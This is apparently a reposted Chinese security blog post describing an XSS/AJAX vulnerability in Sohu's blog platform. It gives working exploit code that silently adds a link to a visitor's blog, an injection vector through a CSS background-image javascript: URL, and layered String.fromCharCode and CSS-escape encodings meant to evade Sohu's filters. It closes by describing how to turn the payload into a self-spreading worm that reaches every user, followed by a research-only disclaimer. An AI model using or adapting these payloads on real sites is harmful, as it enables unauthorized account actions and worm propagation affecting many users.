鬼仔:记得以前有个 Myspace 的XSS worm。
作者:monyer
来源:梦之光芒
搜狐博客存在ajax hacking漏洞,可以实现web worm的功能,下面是具体的利用方法:
标准的ajax数据提交,该ajax的XmlHttp方式为微软msdn提供的标准方法!
<script type="text/javascript"> window.onload=function() { var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null); XmlHttp.onreadystatechange=ServerProcess; } function ServerProcess() { if (XmlHttp.readystate==4 || XmlHttp.readystate=='complete') { alert(XmlHttp.responseText); } } </script>把以上代码缩成一行
window.onload=function(){var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);}漏洞的利用方式
<div style=”background-image:url(javascript:)”>不能执行多语句,所以转到下面的方法eval进行
<div style=”background-image:url(javascript:eval())”>有引号,所以转到下面的方法,String.fromCharCode
<div style=”background-image:url(javascript:eval(String.fromCharCode([十进制的code])))”>这回完成了
在eval里,代码可以自动执行,因此可以不用window.onload,同时去掉函数结构!
var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","http://blog.sohu.com/manage/link.do?m=add&title=Monyer&desc=Monyer%20is%20my%20hero%20%21&link=http%3A//hi.baidu.com/monyer&_",true); XmlHttp.send(null);将上述代码进行String.fromCharCode转码
118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59因此有如下代码,该代码是可以执行的,但会被sohu过滤掉,因此需要进一步加密!
<div style="background-image:url(javascript:eval(String.fromCharCode(118,97,114,32,88,109,108,72,116,116,112,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,104,116,116,112,34,41,59,32,88,109,108,72,116,116,112,46,79,112,101,110,40,34,103,101,116,34,44,34,104,116,116,112,58,47,47,98,108,111,103,46,115,111,104,117,46,99,111,109,47,109,97,110,97,103,101,47,108,105,110,107,46,100,111,63,109,61,97,100,100,38,116,105,116,108,101,61,77,111,110,121,101,114,38,100,101,115,99,61,77,111,110,121,101,114,37,50,48,105,115,37,50,48,109,121,37,50,48,104,101,114,111,37,50,48,37,50,49,38,108,105,110,107,61,104,116,116,112,37,51,65,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,38,95,34,44,116,114,117,101,41,59,32,88,109,108,72,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59)))">再次加密后的结果!
<div style="BACKGROUND-image:/0075/0072/006c/0028/006a/0061/0076/0061/0073/0063/0072/0069/0070/0074/003a/0065/0076/0061/006c/0028/0053/0074/0072/0069/006e/0067/002e/0066/0072/006f/006d/0043/0068/0061/0072/0043/006f/0064/0065/0028/0031/0031/0038/002c/0039/0037/002c/0031/0031/0034/002c/0033/0032/002c/0038/0038/002c/0031/0030/0039/002c/0031/0030/0038/002c/0037/0032/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0036/0031/002c/0031/0031/0030/002c/0031/0030/0031/002c/0031/0031/0039/002c/0033/0032/002c/0036/0035/002c/0039/0039/002c/0031/0031/0036/002c/0031/0030/0035/002c/0031/0031/0038/002c/0031/0030/0031/002c/0038/0038/002c/0037/0039/002c/0039/0038/002c/0031/0030/0036/002c/0031/0030/0031/002c/0039/0039/002c/0031/0031/0036/002c/0034/0030/002c/0033/0034/002c/0037/0037/002c/0031/0030/0035/002c/0039/0039/002c/0031/0031/0034/002c/0031/0031/0031/002c/0031/0031/0035/002c/0031/0031/0031/002c/0031/0030/0032/002c/0031/0031/0036/002c/0034/0036/002c/0038/0038/002c/0037/0037/002c/0037/0036/002c/0031/0030/0034/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0033/0034/002c/0034/0031/002c/0035/0039/002c/0033/0032/002c/0038/0038/002c/0031/0030/0039/002c/0031/0030/0038/002c/0037/0032/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0034/0036/002c/0037/0039/002c/0031/0031/0032/002c/0031/0030/0031/002c/0031/0031/0030/002c/0034/0030/002c/0033/0034/002c/0031/0030/0033/002c/0031/0030/0031/002c/0031/0031/0036/002c/0033/0034/002c/0034/0034/002c/0033/0034/002c/0031/0030/0034/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0035/0038/002c/0034/0037/002c/0034/0037/002c/0031/0030/0039/002c/0031/0031/0031/002c/0031/0031/0030/002c/0031/0032/0031/002c/0031/0030/0031/002c/0031/0031/0034/002c/0034/0036/002c/0039/0038/002c/0031/0030/0038/002c/0031/0031/0031/002c/0031/0030/0033/002c/0034/0036/002c/0031/0031/0035/002c/0031/0031/0031/002c/0031/0030/0034/002c/0031/0031/0037/002c/0034/0036/002c/0039/0039/002c/0031/0031/0031/002c/0031/0030/0039/002c/0034/0037/002c/0031/0030/0039/002c/0039/0037/002c/0031/0031/0030/002c/0039/0037/002c/0031/0030/0033/002c/0031/0030/0031/002c/0034/0037/002c/0031/0030/0038/002c/0031/0030/0035/002c/0031/0031/0030/002c/0031/0030/0037/002c/0034/0036/002c/0031/0030/0030/002c/0031/0031/0031/002c/0036/0033/002c/0031/0030/0039/002c/0036/0031/002c/0039/0037/002c/0031/0030/0030/002c/0031/0030/0030/002c/0033/0038/002c/0031/0031/0036/002c/0031/0030/0035/002c/0031/0031/0036/002c/0031/0030/0038/002c/0031/0030/0031/002c/0036/0031/002c/0037/0037/002c/0031/0031/0031/002c/0031/0031/0030/002c/0031/0032/0031/002c/0031/0030/0031/002c/0031/0031/0034/002c/0033/0038/002c/0031/0030/0030/002c/0031/0030/0031/002c/0031/0031/0035/002c/0039/0039/002c/0036/0031/002c/0037/0037/002c/0031/0031/0031/002c/0031/0031/0030/002c/0031/0032/0031/002c/0031/0030/0031/002c/0031/0031/0034/002c/0033/0037/002c/0035/0030/002c/0034/0038/002c/0031/0030/0035/002c/0031/0031/0035/002c/0033/0037/002c/0035/0030/002c/0034/0038/002c/0031/0030/0039/002c/0031/0032/0031/002c/0033/0037/002c/0035/0030/002c/0034/0038/002c/0031/0030/0034/002c/0031/0030/0031/002c/0031/0031/0034/002c/0031/0031/0031/002c/0033/0037/002c/0035/0030/002c/0034/0038/002c/0033/0037/002c/0035/0030/002c/0034/0039/002c/0033/0038/002c/0031/0030/0038/002c/0031/0030/0035/002c/0031/0031/0030/002c/0031/0030/0037/002c/0036/0031/002c/0031/0030/0034/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0033/0037/002c/0035/0031/002c/0036/0035/002c/0034/0037/002c/0034/0037/002c/0031/0030/0034/002c/0031/0030/0035/002c/0034/0036/002c/0039/0038/002c/0039/0037/002c/0031/0030/0035/002c/0031/0030/0030/002c/0031/0031/0037/002c/0034/0036/002c/0039/0039/002c/0031/0031/0031/002c/0031/0030/0039/002c/0034/0037/002c/0031/0030/0039/002c/0031/0031/0031/002c/0031/0031/0030/002c/0031/0032/0031/002c/0031/0030/0031/002c/0031/0031/0034/002c/0033/0038/002c/0039/0035/002c/0033/0034/002c/0034/0034/002c/0031/0031/0036/002c/0031/0031/0034/002c/0031/0031/0037/002c/0031/0030/0031/002c/0034/0031/002c/0035/0039/002c/0033/0032/002c/0038/0038/002c/0031/0030/0039/002c/0031/0030/0038/002c/0037/0032/002c/0031/0031/0036/002c/0031/0031/0036/002c/0031/0031/0032/002c/0034/0036/002c/0031/0031/0035/002c/0031/0030/0031/002c/0031/0031/0030/002c/0031/0030/0030/002c/0034/0030/002c/0031/0031/0030/002c/0031/0031/0037/002c/0031/0030/0038/002c/0031/0030/0038/002c/0034/0031/002c/0035/0039/0029/0029/0029"></div>加入文章后,访问我空间的人会被自动加上链接,如果再在他的页面加上window.location.href的话,就可以实在蠕虫功能,无限制蔓延,中招的人会成为傀儡,数目也会成几何分布增长知道蔓延到sohu的每一个用户!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论